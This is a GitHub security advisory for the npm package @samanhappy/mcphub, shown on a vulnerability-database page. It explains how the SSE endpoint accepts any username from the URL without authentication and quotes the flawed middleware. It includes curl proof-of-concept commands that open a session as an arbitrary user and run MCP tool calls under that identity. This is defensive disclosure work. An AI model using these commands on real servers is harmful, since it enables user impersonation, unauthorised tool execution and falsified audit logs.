GHSA-WF8Q-WVV8-P8JF

Vulnerability from github – Published: 2026-05-14 20:44 – Updated: 2026-05-14 20:44
VLAI
Summary
@samanhappy/mcphub: SSE Endpoint Accepts Arbitrary Username from URL Path Without Authentication, Enabling User Impersonation
Details

Summary

A critical identity spoofing vulnerability in MCPHub allows any unauthenticated user to impersonate any other user — including administrators — on SSE (Server-Sent Events) and MCP transport endpoints. The server accepts a username from the URL path parameter and creates an internal user session without any database validation, token verification, or authentication check. The source code itself acknowledges this gap with a TODO comment.

Details

MCPHub provides user-scoped SSE endpoints at the path /:user/sse/:group. The sseUserContextMiddleware in src/middlewares/userContext.ts (lines 42–75) extracts the username from req.params.user and constructs a fabricated IUser object directly, bypassing all authentication:

export const sseUserContextMiddleware = async (
  req: Request, res: Response, next: NextFunction,
): Promise<void> => {
  const userContextService = UserContextService.getInstance();
  const username = req.params.user;  // ← Taken directly from URL, no validation whatsoever

  if (username) {
    // Note: In a real implementation, you should validate the user exists
    // and has proper permissions
    const user: IUser = {
      username,          // ← Completely attacker-controlled
      password: '',
      isAdmin: false,    // TODO: Should be retrieved from user database
    };

    userContextService.setCurrentUser(user);  // ← Fabricated identity is accepted as real
    attachCleanupHandlers();
    console.log(`User context set for SSE/MCP endpoint: ${username}`);
    next();
  }
  // ...
};

The SSE routes in src/server.ts (lines 132–161) apply only rate limiting and this context middleware — there is no authentication middleware in the chain:

// User-scoped routes with user context middleware
this.app.get(
  `${this.basePath}/:user/sse/:group(.*)?`,
  mcpConnectionRateLimiter,        // Only rate limiting
  sseUserContextMiddleware,         // Identity from URL — no auth
  (req, res) => handleSseConnection(req, res),
);

Additionally, UserContextService is a singleton that stores the current user in a single instance variable. Under concurrent connections, one user's context can silently overwrite another's, creating a secondary race condition vulnerability (CWE-362).

PoC

Prerequisites: A running MCPHub instance with enableBearerAuth: false (or bearer keys not configured).

Step 1 — Connect to the SSE endpoint as any arbitrary user:

curl -s -N --max-time 3 http://TARGET:3100/CEO-admin-impersonated/sse

Expected response — a valid SSE session is created:

event: endpoint
data: /CEO-admin-impersonated/messages?sessionId=54efc6f5-15ed-4e69-9a0e-de87d3179758

Step 2 — Verify on the server side (server logs):

[INFO] User context set for SSE/MCP endpoint: CEO-admin-impersonated
[INFO] Creating SSE transport with messages path: /CEO-admin-impersonated/messages
[INFO] New SSE connection established: 54efc6f5-15ed-4e69-9a0e-de87d3179758 with group: global for user: CEO-admin-impersonated

The server accepted a completely non-existent user, created a full MCP session, and is ready to proxy tool calls under this fabricated identity. No database lookup was performed, no token was validated.

Step 3 — Execute MCP tool calls under the spoofed identity:

Once the SSE session is established, the attacker can send MCP messages to the returned endpoint path, executing tools under the spoofed user's context:

curl -X POST http://TARGET:3100/CEO-admin-impersonated/messages?sessionId=54efc6f5-15ed-4e69-9a0e-de87d3179758 \
  -H 'Content-Type: application/json' \
  -d '{"jsonrpc":"2.0","id":1,"method":"tools/call","params":{"name":"any-tool","arguments":{}}}'

Impact

This is a user identity spoofing vulnerability on the MCP transport layer. Any unauthenticated network user can:

  • Impersonate any user, including administrators, on SSE/MCP endpoints
  • Execute MCP tool calls under a spoofed user's identity, potentially accessing user-scoped resources and data
  • Poison audit logs — all actions are recorded under the fabricated username, destroying accountability and forensic value
  • Access user-scoped servers and groups that should only be available to authenticated users

All MCPHub instances exposing SSE endpoints without bearer authentication are affected. This includes the default configuration when bearer keys are not explicitly set up.

Reported by the Eresus Security Research Team.

Severity
9.1 (Critical)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@samanhappy/mcphub"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.12.15"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-290"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-14T20:44:22Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "### Summary\n\nA critical identity spoofing vulnerability in MCPHub allows any unauthenticated user to impersonate any other user \u2014 including administrators \u2014 on SSE (Server-Sent Events) and MCP transport endpoints. The server accepts a username from the URL path parameter and creates an internal user session without any database validation, token verification, or authentication check. The source code itself acknowledges this gap with a TODO comment.\n\n### Details\n\nMCPHub provides user-scoped SSE endpoints at the path `/:user/sse/:group`. The `sseUserContextMiddleware` in `src/middlewares/userContext.ts` (lines 42\u201375) extracts the username from `req.params.user` and constructs a fabricated `IUser` object directly, bypassing all authentication:\n\n```typescript\nexport const sseUserContextMiddleware = async (\n  req: Request, res: Response, next: NextFunction,\n): Promise\u003cvoid\u003e =\u003e {\n  const userContextService = UserContextService.getInstance();\n  const username = req.params.user;  // \u2190 Taken directly from URL, no validation whatsoever\n\n  if (username) {\n    // Note: In a real implementation, you should validate the user exists\n    // and has proper permissions\n    const user: IUser = {\n      username,          // \u2190 Completely attacker-controlled\n      password: \u0027\u0027,\n      isAdmin: false,    // TODO: Should be retrieved from user database\n    };\n\n    userContextService.setCurrentUser(user);  // \u2190 Fabricated identity is accepted as real\n    attachCleanupHandlers();\n    console.log(`User context set for SSE/MCP endpoint: ${username}`);\n    next();\n  }\n  // ...\n};\n```\n\nThe SSE routes in `src/server.ts` (lines 132\u2013161) apply only rate limiting and this context middleware \u2014 there is no authentication middleware in the chain:\n\n```typescript\n// User-scoped routes with user context middleware\nthis.app.get(\n  `${this.basePath}/:user/sse/:group(.*)?`,\n  mcpConnectionRateLimiter,        // Only rate limiting\n  sseUserContextMiddleware,         // Identity from URL \u2014 no auth\n  (req, res) =\u003e handleSseConnection(req, res),\n);\n```\n\nAdditionally, `UserContextService` is a **singleton** that stores the current user in a single instance variable. Under concurrent connections, one user\u0027s context can silently overwrite another\u0027s, creating a secondary race condition vulnerability (CWE-362).\n\n### PoC\n\n**Prerequisites:** A running MCPHub instance with `enableBearerAuth: false` (or bearer keys not configured).\n\n**Step 1 \u2014 Connect to the SSE endpoint as any arbitrary user:**\n```bash\ncurl -s -N --max-time 3 http://TARGET:3100/CEO-admin-impersonated/sse\n```\n\nExpected response \u2014 a valid SSE session is created:\n```\nevent: endpoint\ndata: /CEO-admin-impersonated/messages?sessionId=54efc6f5-15ed-4e69-9a0e-de87d3179758\n```\n\n**Step 2 \u2014 Verify on the server side (server logs):**\n```\n[INFO] User context set for SSE/MCP endpoint: CEO-admin-impersonated\n[INFO] Creating SSE transport with messages path: /CEO-admin-impersonated/messages\n[INFO] New SSE connection established: 54efc6f5-15ed-4e69-9a0e-de87d3179758 with group: global for user: CEO-admin-impersonated\n```\n\nThe server accepted a completely non-existent user, created a full MCP session, and is ready to proxy tool calls under this fabricated identity. No database lookup was performed, no token was validated.\n\n**Step 3 \u2014 Execute MCP tool calls under the spoofed identity:**\n\nOnce the SSE session is established, the attacker can send MCP messages to the returned endpoint path, executing tools under the spoofed user\u0027s context:\n```bash\ncurl -X POST http://TARGET:3100/CEO-admin-impersonated/messages?sessionId=54efc6f5-15ed-4e69-9a0e-de87d3179758 \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\"jsonrpc\":\"2.0\",\"id\":1,\"method\":\"tools/call\",\"params\":{\"name\":\"any-tool\",\"arguments\":{}}}\u0027\n```\n\n### Impact\n\nThis is a **user identity spoofing** vulnerability on the MCP transport layer. Any unauthenticated network user can:\n\n- **Impersonate any user**, including administrators, on SSE/MCP endpoints\n- **Execute MCP tool calls** under a spoofed user\u0027s identity, potentially accessing user-scoped resources and data\n- **Poison audit logs** \u2014 all actions are recorded under the fabricated username, destroying accountability and forensic value\n- **Access user-scoped servers and groups** that should only be available to authenticated users\n\nAll MCPHub instances exposing SSE endpoints without bearer authentication are affected. This includes the default configuration when bearer keys are not explicitly set up.\n\nReported by the Eresus Security Research Team.",
  "id": "GHSA-wf8q-wvv8-p8jf",
  "modified": "2026-05-14T20:44:22Z",
  "published": "2026-05-14T20:44:22Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/samanhappy/mcphub/security/advisories/GHSA-wf8q-wvv8-p8jf"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/samanhappy/mcphub"
    },
    {
      "type": "WEB",
      "url": "https://github.com/samanhappy/mcphub/releases/tag/v0.12.15"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "@samanhappy/mcphub: SSE Endpoint Accepts Arbitrary Username from URL Path Without Authentication, Enabling User Impersonation"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.





Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Detection rules are retrieved from Rulezet.